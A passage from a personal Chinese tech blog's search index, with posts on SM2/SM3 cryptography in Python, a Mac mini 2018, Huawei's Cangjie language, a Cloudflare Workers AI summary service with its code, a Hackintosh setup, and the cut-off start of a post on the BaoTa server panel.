"使用罕见的算法是什么感受😁起因前段时间因为某些原因需要对某些东西进行密评改造，需要使用国密算法。虽然国密算法也算进入标准了，但是网上能搜到的资料还是太少了（尤其是Python的，大多资料都是Java的），所以我打算自己研究研究。关于Python使用国密算法的方式其实在新版OpenSSL中已经支持了国密算法，比如SM3还有SM4，不过pyOpenSSL似乎只有对非对称加密算法的支持……我倒是不在乎，因为在我实际应用里加解密都是服务器密码机处理的，我自己连密钥也看不到，所以不需要管怎么实现。但是签名验签还有摘要算法之类的理论上应该是可以自己实现的，毕竟算法是公开的。   关于摘要算法SM3我搜了一下，似乎因为它已经进入标准了，至少在新版的Python中可以用hashlib.new(\"sm3\")这样的方式进行计算，但是旧版的Python用不了……所以如果要在旧版Python上处理还得自己想办法。   既然标准库不太能满足，那第三方库选哪个比较好呢？我看用的比较多的一个是封装C库GmSSL的GmSSL-Python，想要安装得先安装那个C库；还有一个是纯Python实现的gmssl。对我来说的话我更喜欢后面那个纯python实现的，虽然效率低了点，但是看起来比较简单（虽然看起来不是很专业🤣），那个C库包装的感觉有点复杂……而且这两个库有冲突，所以最终我选择了那个纯Python实现的版本。使用SM2withSM3进行验签在一些挑战应答方式的登录方式中就需要用到这种东西，服务器发送一个随机数让客户端用私钥签名，然后服务器用公钥进行验签。我看了一下那个库的“gmssl.sm2.CryptSM2”中有个verify_with_sm3方法挺符合需求的，但有个问题是它这个CryptSM2传入的公钥是串数字，但客户端传来的是证书……看来还得解析证书，我看pyOpenSSL库里有加载证书还有导出公钥的方法，但是那个导出的公钥也不是一串数字……后来看了半天，发现导出的公钥的倒数130位才是公钥😅……最终把所有的值带进去试了一下终于没问题了，最终的代码如下：import OpenSSL.cryptofrom gmssl import sm2import base64certSign = \"\"   # 证书signBytes = b\"\" # 签名inData = b\"\"    # 被签名的值sm2.CryptSM2(    private_key=\"\",    public_key=OpenSSL.crypto.dump_publickey(        OpenSSL.crypto.FILETYPE_ASN1,        OpenSSL.crypto.load_certificate(            OpenSSL.crypto.FILETYPE_PEM,            f\"\"\"-----BEGIN CERTIFICATE-----{certSign}-----END CERTIFICATE-----\"\"\".encode(),        ).get_pubkey(),    ).hex()[-128:],    asn1=True,).verify_with_sm3(signBytes.hex(), inData)使用HMAC-SM3对数据进行消息验证这个其实新版的Python可以直接用，因为新版Python的hashlib里有SM3，所以一句hmac.new(key, data, digestmod=\"sm3\").hexdigest()就可以了，但是我用的是旧版的Python（macOS自带的3.9.6🤣）不支持……那怎么办呢？我看了一下这个函数的注释写的“digestmod”这个参数除了传hashlib支持的方法之外还可以传符合PEP 247的模块。显然无论是GmSSL-Python还是gmssl都没有符合这个规范。不过我可以自己写个适配器来适配这个规范。所以最终只好自己写一下了：import copyimport hmacfrom gmssl import sm3class sm3_adapter:    def __init__(self):        self.msg = []        self.digest_size = 32        self.block_size = 64    def new(self):        self.msg = []    def update(self, data):        self.msg += list(data)    def copy(self):        return copy.deepcopy(self)    def digest(self):        return bytes.fromhex(self.hexdigest())    def hexdigest(self):        return sm3.sm3_hash(self.msg)key = b\"\"   # 密钥data = b\"\"  # 数据hmac.new(key, data, digestmod=sm3_adapter).hexdigest()感想这么看来使用国密算法加密倒是也没很复杂，但是和国际标准相比也没什么优势。虽然有些地方强制使用那确实没啥办法，但是想要普及肯定是不用想了，另外我自己的东西肯定是不敢用国密，虽然进了标准而且也开放了算法，但是很难说会不会像Dual_EC_DRBG算法那样偷偷插了后门 （虽然我觉得他们应该没这个实力🤣） ，但国际算法有后门我不怕，国内算法有后门那就吓人了🤣。" },{ "title": "Mac mini 2018使用体验", "category": "", "tags": "Apple, Mac, 体验", "url": "/2024/08/17/mac-mini.html", "date": "2024/08/17", "content": "买个快过时的产品是什么感受🤣起因最近由于某些原因需要一个装有macOS的电脑用来开发，虽然我自己有MacBook Pro，但是我不太想让我的电脑上装一堆乱七八糟的环境，而且我的Mac只有8GiB内存😅，也不适合整比较复杂的东西。那既然这样上次不是整了个黑苹果吗？但是考虑到黑苹果不太可靠，可能更新着系统就挂了，而且用APFS文件还不好拷出来。那既然买白苹果是不是还是买M芯片的Mac mini比较好？但是这次开发的程序原来是在Intel的Mac上开发的，虽然有Rosetta 2，但是怕出一些莫名其妙的问题，然后再考虑到以后可能要升macOS 15（macOS 16应该就不再支持Intel的Mac了），所以最后还是整了个二手的8+512的Mac mini 2018（i5-8500B版）。更换内存刚拿到手的时候是8GiB内存，显然有点小了，不过Mac mini 2018是支持自己更换内存的，所以又额外买了两条16GiB内存。东西都到了之后就打算直接拆开来换，结果发现我手头没有T6H的螺丝刀🤣。我之前有买过一个很便宜的25合1的螺丝刀套装，里面包含梅花螺丝批头，但是没想到这个Mac mini上的螺丝上面有个柱子，普通的T6螺丝刀根本插不进去。没办法只好单独买了这个螺丝刀……在拿到螺丝刀之前，我觉得还是得看看教程，所以网上搜了个iFixit的教程，看了一下还好只有外壳的螺丝是带柱子的，不然又得买😂。   最后东西到齐之后按照上面的教程把内存换了，这下就成了32+512的Mac mini了，也算够用了。使用体验作为最后一代Intel的Mac，这个Mac mini其实和黑苹果的区别也就是T2芯片了。但要说这个T2芯片到底在使用体验上有啥区别，目前来看只能说几乎没有……当然不是完全没有，因为装有T2芯片以及之后的M芯片的Mac硬盘默认都是加了密的，所以在开启文件保险箱的时候瞬间就能打开，不需要额外的加密过程。黑苹果虽然也支持文件保险箱，似乎是装“AppleKeyFeeder-64.efi”这个驱动就可以，先不说这个东西会不会出问题，至少它在加解密的过程中需要占用CPU，在这个Mac上它的加解密都是在这个T2芯片上进行的，所以不会影响CPU性能，其实这要比Windows的Bitlocker要好一些，现在预装Windows的电脑基本上默认就开了Bitlocker，但使用肯定是要用CPU进行加解密的，多多少少会影响一点性能，在这个Mac上就不会有问题了。   除此之外就是无线网络了，我装的黑苹果是在台式机上装的，没有无线网卡，当然隔空投送也用不了。白苹果就可以，而且很快，我试了一下从我的MacBook传到Mac Mini速度最高可以达到400Mbps，当然和现在的Wi-Fi相比不算很快，但是在我用的设备里面已经算快的了 （用的全是垃圾🤣）    另外我还听说T2芯片在视频编解码上有额外的优势，不过这个我没法测，毕竟买它又不是为了剪辑的，至于看视频基本上只要支持硬件解码，看4K视频都不会有压力，反正我试了我的黑苹果看4K也没有卡。   其他部分和黑苹果几乎没什么区别，毕竟都是Intel的芯片，黑苹果不能干的白苹果一样也不能干，没有因为多出来一个T2芯片就多出来运行ARM程序的能力，至于装Windows……当然两边都能装，白苹果有启动转换，黑苹果本来就能直接装。接下来的话就只能希望苹果在下一个macOS版本更新中淘汰掉没有T2芯片的Intel的Mac，这样黑苹果就彻底完蛋了，而这个有T2芯片的就能发挥它最后的价值了，只不过目前来看黑苹果在macOS 15的Beta版仍然可以装，看来是没什么希望了🤣。感想这么看来买这个Mac mini 2018似乎意义不大啊，不过毕竟要长期用，为了可靠性多花点钱也没什么问题，不过这个二手的Mac mini 2018居然比M1的Mac Mini还要贵😂，明明性能要更差啊……不过考虑到M芯片的加内存那么贵，而且这个Intel芯片的以后就算不用macOS还能装Windows，也许就是这个原因所以更贵吧？" },{ "title": "华为仓颉语言使用体验", "category": "", "tags": "华为, 仓颉, 体验", "url": "/2024/08/03/cangjie.html", "date": "2024/08/03", "content": "看看“自研”的轮子有什么特别之处？起因前段时间因为华为对它的仓颉编程语言开启了公测（公开内测），随后媒体又吹了一波。虽然华为最近也整了好多乱七八糟的东西，但至少我没有亲眼见过。既然这个仓颉的编译器公测了我就申请试试看呗，反正编译器又不需要特定的设备或者系统运行。   申请之后过了几天就通过了，然后编译器的安装包就可以在GitCode上下载。目前看起来没有开源，可以在Windows x64，macOS和Linux的x64和aarch64上运行和编译，另外也支持它的那个鸿蒙Next系统，虽然我申请了那个插件也通过了，但是毕竟没有真机，而且那个IDE挺大的也就算有模拟器可以用也懒得试😂。编写体验首先我下了Windows版的编译器，安装好之后看了看文档，感觉语法倒是没什么复杂的，不过和Python差别还是挺大的，所以还是得看着文档写😂。看了一圈之后首先写个九九乘法表试试看：main() {    for (i in 1..10) {        for (j in 1..i + 1) {            print(\"${j}*${i}=${i*j}\\t\")        }        println()    }}编译之后运行倒是没什么问题，随后再写个递归版的试试看：func row(i: Int): Unit{    if(i < 10){        col(i, 1)        println()        row(i + 1)    }}func col(i:Int, j:Int): Unit{    if(i >= j){        print(\"${j}*${i}=${i*j}\\t\")        col(i, j + 1)    }}main() {    row(1)}运行也没有问题，那就试试看把编译的产物放别的电脑运行试试看？结果就不能运行了。似乎是依赖了“libcangjie-runtime”和“libsecurec”这两个库，即使是在编译选项里开了静态编译也没有用，因为SDK里没有这两个的静态库文件，而且也没有它们的源代码……像Golang都是静态编译没有什么乱七八糟的依赖的啊……   另外我在Github上搜了一下，“libsecurec”这个库是有源代码的，叫做libboundscheck，看名字是用来字符边界检查之类的库，似乎华为很多产品里都有用，在这个SDK里用的是这个版本。   不过如果仓颉主要是给鸿蒙Next用的话，那个系统应该是预先有装仓颉的运行环境的，应该不静态编译也行。对仓颉语言的看法单从我上面写的这点代码看的话这语法比C都复杂😂，看了一下文档乱七八糟的概念还挺多，毕竟是融合了各种各样的语言，有Java的复杂，支持什么注解和反射之类的，还有TS的声明类型，变量还要指定变不变啥的，不过似乎没有关于异步的语法，可能是用线程弥补吧？其他近些年出的语言我没怎么接触过所以其他的不太清楚，不过让AI看了看我写的那段代码它说像Kotlin，然后讨论群里又说借鉴了50%的Rust🤣，确实融合的有点多。另外据说除了编译成机器码（CJNative）外还能编译成字节码（CJVM），不过CJVM在内测，不知道到时候会不会正式发布……除此之外也能调C和Python的库，似乎是用的FFI调用，可以不用单独开个进程然后去获得输出的值，效率应该还是挺高的。   但是要说这个语言有什么特别之处目前似乎也看不出来，不过毕竟仓颉语言算是给鸿蒙Next系统用的，学着iOS/macOS整Swift那样吧，但是在苹果系开发要想用苹果的框架，可能Swift是最好的选项。鸿蒙Next除了这个还整的什么ArkTS（那个可能算是小程序吧，毕竟那个没见过不知道底层是怎么运行的），至于鸿蒙Next能不能用其他语言开发目前也不知道（倒是能用NDK），要是能的话大家肯定是用现有已经开发好的改改然后移植到鸿蒙Next吧（前提是这些公司认为用鸿蒙Next的人使用他们的软件有足够的收益），如果不行从头开发成本就更高了，估计得劝退一大堆公司。毕竟鸿蒙Next没有历史，和Android以及iOS根本不能比，而且相比也没有解决什么痛点，另外其他手机厂商也不会考虑使用鸿蒙Next，只能像苹果一样搞成仅自家使用的系统。但是用户量根本和iPhone不能比，公司可不会听华为在网上的营销，毕竟公司是要实实在在赚钱的，靠营销只能忽悠普通人（但要是普通人买来发现除了国内大厂的软件其他软件全不能用估计也没人买了🤣）。   另外鸿蒙Next好像也会搞PC版，就像Mac那样。不过Mac是正经啥语言写的都能运行，而且相对还是挺开放的，到时候如果PC版的鸿蒙Next连终端个也没有，而且只能运行仓颉语言写的软件那怕是比其他Linux发行版还废了🤣。    不过如果用户侧如果搞不好的话说不定可以在服务器上用，毕竟服务器的话只在乎能不能写出这个软件，至于用什么语言写其实不重要，只要性能好就行，如果华为能整一批写仓颉的学生，还能把该整的库整好，也许会有公司考虑用，在做政府相关的项目说不定可以作为卖点🤣。感想虽然说华为整的这堆莫名其妙的东西也许没什么用，或者也可能会有些用，不过毕竟搞这些东西已经算是用公司的前景去赌未来了，虽然拿这些东西搞营销很恶心，但目前来看至少确实是有在也许没回报的东西上投真金白银的，还是挺厉害的。   但正因为它们营销搞太多了，到时候因为搞这些东西把公司玩死了我觉得也是大快人心的🤣🤣🤣。" },{ "title": "使用Cloudflare Workers制作博客AI摘要", "category": "", "tags": "Cloudflare, Workers, AI, 博客", "url": "/2024/07/03/ai-summary.html", "date": "2024/07/03", "content": "Cloudflare实在是太强了，以至于全都依赖它了😂起因虽然很早就在关注AI了，而且也看到有些博客早已用上了AI摘要（比如xLog下的），但是一般都要后端提前生成好，另外那时候还没有那么多免费好用的接口可以用，像OpenAI到现在还没有GPT免费的API😂，至于花钱就更是想都别想，互联网的东西我是不会花钱的，就因为这样我一直都没有考虑过给我的博客加AI摘要的功能。   直到前两天看到一个Hexo的博客有一个AI摘要的功能，如果是有后端的博客我可能还没什么兴趣，但是既然是纯前端的就引发了我的兴趣，我大概看了一下，用的是一个叫Post-Abstract-AI的项目，定睛一看，居然还是收费的，而且API Key还是直接明文放代码里的，给我看笑了。如果我拿着这个Key去不停刷使用量不一会就把它刷完了？不过这时候我想起来赛博活佛Cloudflare之前也出了AI功能，还是免费的，我何不用Workers写一个好好打脸一下这个收费的项目？就像我对Server酱做的事情一样。开始制作首先先不考虑重复造轮子，去Github上看看有没有现成的，毕竟Cloudflare的这个AI功能也出了不少时间了，搜了一下还真有，叫Qwen-Post-Summary，用的居然还是阿里的通义千问模型，这倒是不错，毕竟如果用Llama3的话说不定给我生成出来全是英文了，国产的模型至少都是对中文优化过的。   我仔细看了看，发现它怎么是把文章放GET请求里的，要知道浏览器是不会允许超过4KiB的请求头的，看了一下代码还截取成前1800字了，感觉有点不爽，不过我搜了一下，为了能简单的做到流式效果，用的EventSource功能根本不支持POST请求……看来这个代码不能直接拿来用了，另外我也不希望每次打开文章都重新生成摘要，那样不仅浪费计算资源，而且毫无意义，毕竟文章又不会变。所以我首先考虑怎么样存AI生成的结果呢？另外为了能通过POST把文章喂给AI我也得考虑存文章。最开始我想着用Workers的KV数据库，因为那是最早出的，虽然限制很多但当时没得选。但这次点开发现居然有个D1数据库，容量更大，延迟更低，操作次数更多而且还支持SQL语法，这不比那个KV数据库好太多了，这下都不知道这个KV数据库留着还有啥意义了，可能就单纯是为了兼容以前的应用不得不留着了吧。   不过既然会存储内容，还得考虑一点就是万一有人偷偷拿我的接口把我的文章内容换了，让AI生成了糟糕的内容，显示在我的文章里多不合适啊，所以为了避免这种问题，我每次会对比文章的数字摘要，免得有人把我数据库里的文章篡改了🤣。   最终基于上面的代码边查文档边改把代码写出来了，顺便把我之前写的博客计数器也一起替换掉了，做到真正的Serverless：async function sha(str) {  const encoder = new TextEncoder();  const data = encoder.encode(str);  const hashBuffer = await crypto.subtle.digest(\"SHA-256\", data);  const hashArray = Array.from(new Uint8Array(hashBuffer)); // convert buffer to byte array  const hashHex = hashArray    .map((b) => b.toString(16).padStart(2, \"0\"))    .join(\"\"); // convert bytes to hex string  return hashHex;}async function md5(str) {  const encoder = new TextEncoder();  const data = encoder.encode(str);  const hashBuffer = await crypto.subtle.digest(\"MD5\", data);  const hashArray = Array.from(new Uint8Array(hashBuffer)); // convert buffer to byte array  const hashHex = hashArray    .map((b) => b.toString(16).padStart(2, \"0\"))    .join(\"\"); // convert bytes to hex string  return hashHex;}export default {  async fetch(request, env, ctx) {    const db = env.blog_summary;    const url = new URL(request.url);    const query = decodeURIComponent(url.searchParams.get('id'));    const commonHeader = {      'Access-Control-Allow-Origin': '*',      'Access-Control-Allow-Methods': \"*\",      'Access-Control-Allow-Headers': \"*\",      'Access-Control-Max-Age': '86400',    }    if (query == \"null\") {      return new Response(\"id cannot be none\", {        headers: {          'Access-Control-Allow-Origin': '*',          'Access-Control-Allow-Methods': \"*\",          'Access-Control-Allow-Headers': \"*\",          'Access-Control-Max-Age': '86400',        }      });    }    if (url.pathname.startsWith(\"/summary\")) {      let result = await db.prepare(        \"SELECT content FROM blog_summary WHERE id = ?1\"      ).bind(query).first(\"content\");      if (!result) {        return new Response(\"No Record\", {          headers: commonHeader        });      }      const messages = [        {          role: \"system\", content: `          你是一个专业的文章摘要助手。你的主要任务是对各种文章进行精炼和摘要，帮助用户快速了解文章的核心内容。你读完整篇文章后，能够提炼出文章的关键信息，以及作者的主要观点和结论。          技能            精炼摘要：能够快速阅读并理解文章内容，提取出文章的主要关键点，用简洁明了的中文进行阐述。            关键信息提取：识别文章中的重要信息，如主要观点、数据支持、结论等，并有效地进行总结。            客观中立：在摘要过程中保持客观中立的态度，避免引入个人偏见。          约束            输出内容必须以中文进行。            必须确保摘要内容准确反映原文章的主旨和重点。            尊重原文的观点，不能进行歪曲或误导。            在摘要中明确区分事实与作者的意见或分析。          提示            不需要在回答中注明摘要（不需要使用冒号），只需要输出内容。          格式            你的回答格式应该如下：              这篇文章介绍了<这里是内容>          ` },        { role: \"user\", content: result.substring(0, 5000) }      ]      const stream = await env.AI.run('@cf/qwen/qwen1.5-14b-chat-awq', {        messages,        stream: true,      });      return new Response(stream, {        headers: {          \"content-type\": \"text/event-stream; charset=utf-8\",          'Access-Control-Allow-Origin': '*',          'Access-Control-Allow-Methods': \"*\",          'Access-Control-Allow-Headers': \"*\",          'Access-Control-Max-Age': '86400',        }      });    } else if (url.pathname.startsWith(\"/get_summary\")) {      const orig_sha = decodeURIComponent(url.searchParams.get('sign'));      let result = await db.prepare(        \"SELECT content FROM blog_summary WHERE id = ?1\"      ).bind(query).first(\"content\");      if (!result) {        return new Response(\"no\", {          headers: commonHeader        });      }      let result_sha = await sha(result);      if (result_sha != orig_sha) {        return new Response(\"no\", {          headers: commonHeader        });      } else {        let resp = await db.prepare(          \"SELECT summary FROM blog_summary WHERE id = ?1\"        ).bind(query).first(\"summary\");        if (resp) {          return new Response(resp, {            headers: commonHeader          });        } else {          const messages = [            {              role: \"system\", content: `          你是一个专业的文章摘要助手。你的主要任务是对各种文章进行精炼和摘要，帮助用户快速了解文章的核心内容。你读完整篇文章后，能够提炼出文章的关键信息，以及作者的主要观点和结论。          技能            精炼摘要：能够快速阅读并理解文章内容，提取出文章的主要关键点，用简洁明了的中文进行阐述。            关键信息提取：识别文章中的重要信息，如主要观点、数据支持、结论等，并有效地进行总结。            客观中立：在摘要过程中保持客观中立的态度，避免引入个人偏见。          约束            输出内容必须以中文进行。            必须确保摘要内容准确反映原文章的主旨和重点。            尊重原文的观点，不能进行歪曲或误导。            在摘要中明确区分事实与作者的意见或分析。          提示            不需要在回答中注明摘要（不需要使用冒号），只需要输出内容。          格式            你的回答格式应该如下：              这篇文章介绍了<这里是内容>          ` },            { role: \"user\", content: result.substring(0, 5000) }          ]          const answer = await env.AI.run('@cf/qwen/qwen1.5-14b-chat-awq', {            messages,            stream: false,          });          resp = answer.response          await db.prepare(\"UPDATE blog_summary SET summary = ?1 WHERE id = ?2\")            .bind(resp, query).run();          return new Response(resp, {            headers: commonHeader          });        }      }    } else if (url.pathname.startsWith(\"/is_uploaded\")) {      const orig_sha = decodeURIComponent(url.searchParams.get('sign'));      let result = await db.prepare(        \"SELECT content FROM blog_summary WHERE id = ?1\"      ).bind(query).first(\"content\");      if (!result) {        return new Response(\"no\", {          headers: commonHeader        });      }      let result_sha = await sha(result);      if (result_sha != orig_sha) {        return new Response(\"no\", {          headers: commonHeader        });      } else {        return new Response(\"yes\", {          headers: commonHeader        });      }    } else if (url.pathname.startsWith(\"/upload_blog\")) {      if (request.method == \"POST\") {        const data = await request.text();        let result = await db.prepare(          \"SELECT content FROM blog_summary WHERE id = ?1\"        ).bind(query).first(\"content\");        if (!result) {          await db.prepare(\"INSERT INTO blog_summary(id, content) VALUES (?1, ?2)\")            .bind(query, data).run();          result = await db.prepare(            \"SELECT content FROM blog_summary WHERE id = ?1\"          ).bind(query).first(\"content\");        }        if (result != data) {          await db.prepare(\"UPDATE blog_summary SET content = ?1, summary = NULL WHERE id = ?2\")            .bind(data, query).run();        }        return new Response(\"OK\", {          headers: commonHeader        });      } else {        return new Response(\"need post\", {          headers: commonHeader        });      }    } else if (url.pathname.startsWith(\"/count_click\")) {      let id_md5 = await md5(query);      let count = await db.prepare(\"SELECT `counter` FROM `counter` WHERE `url` = ?1\")        .bind(id_md5).first(\"counter\");      if (url.pathname.startsWith(\"/count_click_add\")) {        if (!count) {          await db.prepare(\"INSERT INTO `counter` (`url`, `counter`) VALUES (?1, 1)\")            .bind(id_md5).run();          count = 1;        } else {          count += 1;          await db.prepare(\"UPDATE `counter` SET `counter` = ?1 WHERE `url` = ?2\")            .bind(count, id_md5).run();        }      }      if (!count) {        count = 0;      }      return new Response(count, {        headers: commonHeader      });    } else {      return Response.redirect(\"https://mabbs.github.io\", 302)    }  }}另外也写了配套的前端代码（用的jQuery，其实应该用Fetch的😂）：<b>AI摘要</b><p id=\"ai-output\">正在生成中……</p><script>  async function sha(str) {    const encoder = new TextEncoder();    const data = encoder.encode(str);    const hashBuffer = await crypto.subtle.digest(\"SHA-256\", data);    const hashArray = Array.from(new Uint8Array(hashBuffer)); // convert buffer to byte array    const hashHex = hashArray      .map((b) => b.toString(16).padStart(2, \"0\"))      .join(\"\"); // convert bytes to hex string    return hashHex;  }  async function ai_gen(){    var postContent = \"文章标题：\" + {{ page.title | jsonify }} + \"；文章内容：\" + {{ page.content | strip_html | strip_newlines | jsonify }};    var postContentSign = await sha(postContent);    var outputContainer = document.getElementById(\"ai-output\");    $.get(\"https://summary.mayx.eu.org/is_uploaded?id={{ page.url }}&sign=\" + postContentSign, function (data) {      if (data == \"yes\") {        $.get(\"https://summary.mayx.eu.org/get_summary?id={{ page.url }}&sign=\" + postContentSign, function (data2) {          outputContainer.textContent = data2;        });      } else {        $.post(\"https://summary.mayx.eu.org/upload_blog?id={{ page.url }}\", postContent, function (data) {          $.get(\"https://summary.mayx.eu.org/get_summary?id={{ page.url }}&sign=\" + postContentSign);          const evSource = new EventSource(\"https://summary.mayx.eu.org/summary?id={{ page.url }}\");          outputContainer.textContent = \"\";          evSource.onmessage = (event) => {            if (event.data == \"[DONE]\") {              evSource.close();              return;            } else {              const data = JSON.parse(event.data);              outputContainer.textContent += data.response;            }          }        });      }    });  }  ai_gen();</script>本来文章内容应该从html里读更好一些，但是标签啥的还得用正则去掉，感觉不如Liquid方便😂。另外博客计数器不应该用MD5的，但懒得改之前的数据了，还好Cloudflare Workers为了兼容是支持MD5的，免得我还得想办法改数据库里的数据。使用方法如果想给自己的静态博客加AI摘要功能的话也可以用我的接口，把前端代码粘到模板里就行，反正是用的Cloudflare的资源，而且现在通义千问的模型还是Beta版调用没有次数限制，就算之后变正式版，也能每天免费用1w个神经元，好像可以进行1k次左右的生成，完全够用了，只要别和我文章url重了就行。   不过毕竟Workers本身是有每日调用次数限制的，自己部署当然更好。方法也很简单，首先在D1里创建一个数据库，然后创建一个Workers，在变量里绑定AI和新建的D1数据库，名字要起成blog_summary，如果想换名字就要改代码，里面建一张叫做blog_summary的表，需要有3个字段，分别是id、content、summary，都是text类型，如果想用博客计数器功能就再加一张counter表，一个是url，text类型，另一个是counter，int类型。本来博客计数器接口名字也打算用counter的，结果不知道AdBlock有什么大病，居然会屏蔽“counter?id=”这样的请求😆，害的我只能改成count_click这样的名字了。其他想法加了这个功能之后感觉效果还挺不错的，这下就有点想加点别的功能了，比如文章推荐和知识库问答啥的， 不过这个似乎需要什么向量数据库，而且数据需要进行“嵌入”处理，这用现有的东西感觉难度实在是太高了所以就算了…… （在2024.09.27中已经实现了） 另外还想用文生图模型给我的文章加个头图，不过我天天写的都是些技术文章，没啥图可加吧🤣。其他的之后再看看有什么有意思的功能再加吧。感想Cloudflare真不愧是赛博活佛，这波操作下来不就省下了那笔生成费用？啥都是免费的，不过问题就是Cloudflare在这方面几乎是垄断地位，虽然国际大厂倒是不担心倒闭，不过万一挂了想再找个这样厉害的平台可就没了😆。" },{ "title": "Hackintosh使用体验", "category": "", "tags": "Apple, Hackintosh, macOS, 黑苹果", "url": "/2024/06/16/hackintosh.html", "date": "2024/06/16", "content": "使用Mac到底有些什么优势呢？起因我曾经装过很多系统，Windows、FreeBSD、Linux发行版什么的都试过，但是直到我拥有MacBook我也没有试过安装黑苹果。主要是在ARM芯片的Mac出现之前，我一直看不起Mac，因为没有差异化，明明和其他电脑用的是同样的东西，一样的CPU、一样的显卡、一样的内存以及硬盘，凭什么比其他电脑贵那么多，也因此CPU能效不行，续航也不行，而且质量也不行，据说在使用蝴蝶键盘那段时间，键盘的损坏率极高，而且散热很差，经常出现CPU空焊的问题，还因此有了“梦幻单热管”的名号。   当然也是因为垃圾的硬件，与其配套的软件macOS也并没有什么优势，我也没什么兴趣去装黑苹果，对我来说我觉得x86时代的macOS更像是一种Linux发行版。   但直到ARM芯片的Mac出来之后，一切才不一样起来，差异化是一方面，在这个芯片的加持下的macOS也出现了很多的黑科技……当然这都不是重点，重点是最近正好需要一台Mac，我又不想用我自己的MacBook，所以随便找了台电脑装了个黑苹果试试效果。安装体验据说安装黑苹果很麻烦，不过具体麻烦在哪我也不太清楚。看了一下教程是要根据自己的电脑硬件情况自定义一个EFI文件夹用来引导，应该就是用这个方式模拟Mac的引导环境。至于怎么搞这个EFI文件夹我搜了一下，有一个叫做RapidEFI-Tool的软件可以填入自己电脑的硬件信息然后一键生成EFI。生成完成之后把要装macOS的硬盘的分区全部删除，然后新建ESP分区，把EFI文件放进去就行了，然后剩余的空间再创建一个分区，把苹果官方的系统镜像用balenaEtcher烧录到U盘里，剩下的就和正常安装系统的步骤一样了，遵循向导的提示进行就行了。   这么来看好像也没有很复杂，也可能是因为我用的是台式机，不用考虑无线网络之类的问题吧（当然隔空投送之类的东西就用不了了），我看其他大多数人遇到的问题好像都出在无线网络上，而且我的CPU比较老，是i5-7500，在适合装黑苹果的范围内，所以没有出现奇怪的问题，安装完成之后硬盘、显卡、内存都正确识别了，打开浏览器也能正常上网，看来是成功了。使用体验我装的系统和我的MacBook一样，都是macOS Sonoma 14.5，所以整体体验都是一样的，而且黑苹果的内存还更大，是16GiB的，这也能让我安心的尝试虚拟机了，不像我的笔记本才8GiB连虚拟机都不敢安。   绝大多数软件安装都没有问题，使用也和笔记本一样，不过如果完全一样不就体现不出我笔记本的优势了嘛🤣，我还试了试别的软件，比如针对Apple芯片优化的llama.cpp，试了一下可以运行，但是结果全是乱码。应该是llama.cpp可以调Metal的API使用核显进行加速，但是核显好像最多只能分配2GiB的显存，而且和Apple芯片不一样的是它好像并不是可以随意分配内存给显卡的，分配给显卡的部分CPU就不能用了，而Apple芯片是两边都可以用，也正是如此，假设核显的内存够用，模型也要占两份内存，而Apple芯片的只需要占一份内存（我猜的😝）。   另外使用了Apple芯片的NPU的软件Mochi Diffusion也是不能运行的，因为根本没有做x86版本的🤣，不过用brew安装居然可以安，但是打不开🤣，所以提了个pr。不过就算做了拿Intel那个核显跑估计会卡死。   另外还有PlayCover也装不了，这个也算是Apple芯片的特色了，毕竟苹果不可能做ARM转x86的Rosetta，iOS的软件只可能是ARM架构的，Intel的Mac当然执行不了了。   还有为GPTk设计的软件Whisky也不能用，不过这个无所谓，毕竟黑苹果想切回Windows再简单不过了，根本没有安装这种软件的必要，当然如果说类似的，Crossover应该可以用，不过那个不是免费的，所以我不会去尝试它。   虚拟机的话我先试了一下VMware Fusion，安装是正常的，但是打不开，BIOS的虚拟化也开了，VT-d好像黑苹果不能开但应该不影响运行虚拟机。之后又试了一下UTM，我本来以为UTM是专门给Apple芯片使用的，结果居然能安装上，而且Intel版也有苹果官方的虚拟化框架，所以原生运行x86版的Ubuntu没有问题，而且系统信息显示的是Apple Virtualization Generic Platform，看来虚拟化的功能都是正常的，黑苹果效果还不错。感想虽然总的来看黑苹果算是不错，但是在我看来也顶多省了个Mac Mini而已，当然Mac Pro应该也能拿黑苹果代替，iMac毕竟有个质量还不错的屏幕，不能完全代替。毕竟从功能来说，我觉得macOS和Linux差不多，尤其现在Linux的软件越来越多，现在连微信都有Linux原生版了，而且还有Intel Mac没有的移动端软件（Linux可以用容器运行Android）。不过对于笔记本来说，续航是最大的优势，Apple芯片+macOS带来的笔记本体验才是最好的，其他Mac Mini啥的根本没有体现出Apple芯片的优势，毕竟要说性能的话同价格Mac是没有优势的，唯有续航是没有其他笔记本产品能打的（带充电宝没用，充电宝能续几个航啊）。" },{ "title": "从宝塔面板中学习运维知识", "category": "", "tags": "宝塔, 运维", "url": "/2024/05/19/bt-ops.html", "date": "2024/05/19", "content": "用Python代码的程序就等着被抄吧！起因之前我用旧电脑拼了一堆服务器，但是上面装的东西其实试完之后就没什么兴趣了，主要是它们实际上没有解决什么问题。后来我觉得还是更应该向更有意义的地方靠，于是我就在每个机器上安装了不同的运维面板，打算分别测试一下效果。   我安装的面板有1Panel，小皮面板公测版，宝塔面板破解版。1Panel很不错，但是除了网站管理之外功能全是Docker带来的，另外代码是Go写的我现在还看不懂。小皮面板重构之后很令我失望，功能比旧版小皮面板还少，安装的时候居然还会收集服务器信息并上传？运行环境版本少，PHP连扩展安装的功能都没有，而且现在直接摆烂全放的是配置文件，要是都自己改配置文件了还要面板干啥？另外重构之后也变成Go写的了，就这样拿什么和别的面板打？   宝塔面板破解版之前我在测试Koyeb的时候试过一个，不过后来看到了一个新的，主要是之前那个界面上改的全是的广告，新找的这个破解版不仅界面没有做什么修改，而且后端开源，也不用担心有什么后门。   虽然我不信任宝塔面板，毕竟漏洞出的多，各种收费项目，还各种收集用户信息，强制登录啥的，但是有一个好处就是它是Python写的，而且大多数代码并没有混淆（代码倒是开源了，就是没更新）。作为一款算是比较成熟的面板，有些功能还是比较有意思的，而且我也能看懂Python代码，所以有些有意思的功能就可以看看它的代码是如何实现的。功能探索与解析对于免费版有的功能，其实我不太关心，一是那些大多数并不复杂，自己装也没什么难度，二是大多功能其实我并不感兴趣🤣。对于付费功能不得不说有的还挺离谱的，有些非常简单的功能价格居然很贵，比如服务器网络加速BBR，这个功能是内核提供的，自己一个命令就能打开，和宝塔半毛钱关系都没有，价格居然是4.93元/天？不过我没用过官网下的宝塔，不知道是破解版乱标还是真是这个价格。   